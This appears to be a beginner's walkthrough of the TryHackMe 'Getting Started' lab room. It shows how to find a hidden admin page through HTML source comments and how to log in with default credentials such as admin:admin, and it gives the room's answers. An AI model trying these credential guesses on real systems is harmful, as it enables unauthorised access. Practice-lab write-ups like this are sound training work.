TryHackMe “Getting Started” walkthrough
- Join this room
- Click the blue “Start AttackBox” button at the top right of this room. wait for 60 seconds for the IP to appear on the top.
Now you should see like this
Now enter the IP Address that appears on the top of a new tab and go to this page. It’s very common for developers to leave comments about how the application works on the web page source. Sometimes this information can include usernames, passwords, and even hidden pages that users are not usually supposed to have access to.
A page like this should appear:
What is the name of the hidden admin page?
Now We need to see the page source. So, Simply right-click on the page and click “view page source”
The comments on a web page usually begin with the <! — character. Go through the source and identify and comments.
Thus Ans = /test-admin
Now let’s check what is on the admin page open a new tab and enter the “machine’s-IP/test-admin”
So, Here you will see an admin-page like this:
You’ll now notice that there’s a login form on the hidden admin page. This login form may take you to the administrator portal of the BFFs platform. It’s dangerous for an attacker to get access to pages like this as there would be dangerous functionality on there such as:
- accessing sensitive user information (names, addresses)
- modifying users profiles
It’s very common for applications to use default credentials. These credentials tend to be easy to guess and are provided by third-party applications when they are installed. Common username and passwords include (in the format username: password):
admin:admin
admin:password
administrator:password123
Try these default credentials to gain access to the administrator portal.
- Try admin: admin
It works!!
What is the username and password in the form username: password?
Ans : admin: admin
How many users are signed up tothe application?
Ans:- 3